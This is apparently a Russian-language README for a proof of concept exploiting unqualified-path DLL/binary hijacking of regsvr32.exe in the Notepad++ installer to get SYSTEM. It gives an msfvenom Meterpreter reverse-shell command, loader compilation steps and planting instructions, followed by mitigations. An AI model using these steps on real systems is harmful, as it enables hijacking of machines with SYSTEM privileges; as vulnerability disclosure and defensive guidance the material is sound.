##
 вызывает regsvr32.exe для регистрации некоторых компонентов, но делает это без указания полного пути (например, C:\Windows\System32\regsvr32.exe).
Когда исполняемый файл запускается без полного пути, Windows использует определенный порядок поиска для его нахождения:
1. Папка, из которой было запущено приложение (например, Downloads)
Таким образом, если поддельный regsvr32.exe помещен в ту же папку, что и установщик (например, Downloads), Windows будет использовать его раньше настоящего.
- Злоумышленник помещает вредоносный regsvr32.exe в ту же папку, что и легитимный установщик Notepad++ (например, в папку Downloads жертвы).
- Жертва запускает установщик (думая, что он безопасен).
- Установщик вызывает regsvr32.exe, но в итоге выполняет вредоносный из той же папки — с привилегиями SYSTEM (поскольку установщики обычно запрашивают права администратора).
- Полезная нагрузка злоумышленника теперь работает как NT AUTHORITY\SYSTEM.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c > shellcode.txt
2. Скачайте файл "regsvr32_loader.c" и отредактируйте его.
3. Вставьте весь шелл-код из shellcode.txt в указанный комментарий.
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
set payload windows/x64/meterpreter/reverse_tcp
6. Скачайте уязвимую версию Notepad++, т.е. версию до 8.8.1, так как 8.8.1 теперь обновляется автоматически.For PoC я использовал Notepad++ v8.6.8
7. Переместите файл "regsvr32.exe" в систему Windows в ту же папку, где находится установщик notepad++, вероятно, в папку Downloads.
8. Завершите установку установщика Notepad++.
Примечание: Это PoC, поэтому тестирование проводилось с отключенными Защитником Windows и защитой в реальном времени.
* Обновить Notepad++ до версии 8.8.2 или выше
* Ограничить установку программного обеспечения доверенными администраторами
* Использовать AppLocker, WDAC или политики ограничения программ (SRP) для:
* Блокировки выполнения из папок, доступных для записи пользователями (например, Downloads)
* Предотвращения выполнения недоверенных двоичных файлов, таких как regsvr32.exe, из неавторизованных путей
* Принудительной проверки подписей кода для исполняемых файлов
Группам безопасности следует регулярно аудировать пути установки, контролировать права на запись и наблюдать за поведением во время выполнения установщика, чтобы уменьшить поверхность атаки.
Лицензия MIT — Бесплатно только для образовательных, исследовательских и защитных целей.
Приветствуются запросы на слияние (Pull Requests) — улучшайте обнаружение, добавляйте функции или предлагайте исправления.
Этот PoC предназначен **только для образовательных и исследовательских целей**. Используйте его на свой страх и риск. Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.
The full story
This article is one source in a clustered incident — the cluster page carries the summary, timeline and every other outlet covering it.
